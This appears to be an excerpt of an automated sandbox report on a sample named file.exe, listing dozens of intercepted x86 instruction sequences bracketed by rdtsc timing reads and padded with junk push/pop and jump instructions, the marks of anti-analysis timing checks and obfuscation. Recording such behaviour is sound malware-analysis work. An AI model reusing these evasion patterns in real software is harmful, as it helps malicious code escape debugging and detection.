Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B360D second address: 13B3661 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB1C8B21D38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D3034h], ebx 0x00000029 push 00000004h 0x0000002b sub dword ptr [ebp+122D1ED2h], edi 0x00000031 nop 0x00000032 jmp 00007FB1C8B21D42h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3661 second address: 13B366B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3D84 second address: 13B3D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3E35 second address: 13B3EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB1C8D0EF75h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FB1C8D0EF68h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 xor dword ptr [ebp+1245A7ECh], eax 0x0000002e lea eax, dword ptr [ebp+1247688Eh] 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FB1C8D0EF68h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e adc dl, 00000016h 0x00000051 nop 0x00000052 push ecx 0x00000053 push ecx 0x00000054 push esi 0x00000055 pop esi 0x00000056 pop ecx 0x00000057 pop ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FB1C8D0EF74h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC48C second address: 13EC490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC632 second address: 13EC63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC63B second address: 13EC63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC79A second address: 13EC7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB1C8D0EF66h 0x0000000a jmp 00007FB1C8D0EF73h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECAB8 second address: 13ECABD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECC48 second address: 13ECC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECC4C second address: 13ECCA7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1C8B21D4Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB1C8B21D45h 0x0000000f js 00007FB1C8B21D38h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007FB1C8B21D40h 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB1C8B21D46h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECCA7 second address: 13ECCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECCAB second address: 13ECCB5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECCB5 second address: 13ECCC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB1C8D0EF66h 0x0000000a jnl 00007FB1C8D0EF66h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECF8A second address: 13ECF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECF8E second address: 13ECFA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007FB1C8D0EF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d js 00007FB1C8D0EFA9h 0x00000013 jnp 00007FB1C8D0EF72h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECFA9 second address: 13ECFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECFAF second address: 13ECFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ECFB6 second address: 13ECFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D44h 0x00000009 jmp 00007FB1C8B21D3Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3412 second address: 13F3437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8D0EF76h 0x00000009 jbe 00007FB1C8D0EF66h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3437 second address: 13F343D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F343D second address: 13F3441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137A7BF second address: 137A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137A7C5 second address: 137A7D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FB1C8D0EF66h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F7F7D second address: 13F7F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB1C8B21D3Eh 0x0000000b jo 00007FB1C8B21D36h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F80CC second address: 13F80F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FB1C8D0EF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1C8D0EF78h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F80F2 second address: 13F8136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D43h 0x00000007 jmp 00007FB1C8B21D3Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB1C8B21D3Ch 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FB1C8B21D3Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F8136 second address: 13F816F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FB1C8D0EF79h 0x0000000b jmp 00007FB1C8D0EF79h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F874A second address: 13F8760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB1C8B21D40h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F8760 second address: 13F87C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF71h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007FB1C8D0EF66h 0x00000012 jmp 00007FB1C8D0EF78h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b jmp 00007FB1C8D0EF6Dh 0x00000020 push edi 0x00000021 jmp 00007FB1C8D0EF78h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F87C7 second address: 13F87CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F8BE9 second address: 13F8C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB1C8D0EF66h 0x0000000a push eax 0x0000000b jl 00007FB1C8D0EF66h 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCB66 second address: 13FCB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCB6E second address: 13FCB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCCC0 second address: 13FCCD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB1C8B21D40h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCCD8 second address: 13FCCF0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB1C8D0EF66h 0x00000008 jc 00007FB1C8D0EF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007FB1C8D0EF6Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCF92 second address: 13FCF9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB1C8B21D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FCF9E second address: 13FCFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB1C8D0EF72h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FF236 second address: 13FF23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FF23C second address: 13FF280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FB1C8D0EF66h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jno 00007FB1C8D0EF66h 0x00000014 popad 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FB1C8D0EF6Bh 0x0000001d pop esi 0x0000001e popad 0x0000001f jnl 00007FB1C8D0EF84h 0x00000025 jmp 00007FB1C8D0EF70h 0x0000002a push ebx 0x0000002b jl 00007FB1C8D0EF66h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14072C5 second address: 14072CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14072CB second address: 14072D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407508 second address: 140751E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140751E second address: 1407527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407527 second address: 140752B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407695 second address: 1407699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407699 second address: 14076E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB1C8B21D42h 0x0000000e pop eax 0x0000000f jmp 00007FB1C8B21D41h 0x00000014 popad 0x00000015 jl 00007FB1C8B21D54h 0x0000001b pushad 0x0000001c jmp 00007FB1C8B21D42h 0x00000021 pushad 0x00000022 popad 0x00000023 push edi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407821 second address: 1407825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407825 second address: 1407831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FB1C8B21D36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407831 second address: 1407845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FB1C8D0EF66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FB1C8D0EF66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14079C7 second address: 14079D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 ja 00007FB1C8B21D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14079D7 second address: 14079F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB1C8D0EF74h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14079F4 second address: 1407A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB1C8B21D49h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1407B89 second address: 1407B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140DBCA second address: 140DBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C506 second address: 140C50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C50A second address: 140C510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C67B second address: 140C681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C681 second address: 140C68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C68A second address: 140C68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C833 second address: 140C840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB1C8B21D36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140C9CF second address: 140C9E9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB1C8D0EF68h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FB1C8D0EF6Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140CB63 second address: 140CB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 140CB69 second address: 140CB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B389F second address: 13B38B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14102A1 second address: 14102AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1C8D0EF66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1410554 second address: 1410564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB1C8B21D36h 0x0000000a jnc 00007FB1C8B21D36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141606F second address: 1416073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141658A second address: 141658E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14170F5 second address: 1417108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jo 00007FB1C8D0EF66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1417108 second address: 141712A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D48h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141712A second address: 1417134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB1C8D0EF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1417944 second address: 1417966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D41h 0x00000009 jne 00007FB1C8B21D36h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1417966 second address: 1417975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jp 00007FB1C8D0EF66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1417975 second address: 1417986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D3Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142114F second address: 1421153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1421153 second address: 1421157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420535 second address: 1420541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007FB1C8D0EF66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420541 second address: 1420545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420545 second address: 142054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 142054B second address: 142055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB1C8B21D3Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1420B95 second address: 1420B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1426E4D second address: 1426E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14276CE second address: 14276D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14276D4 second address: 14276E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1C8B21D3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14279FD second address: 1427A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427A03 second address: 1427A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427B58 second address: 1427B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427B5C second address: 1427B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FB1C8B21D4Bh 0x0000000c jmp 00007FB1C8B21D3Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1427C9D second address: 1427CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
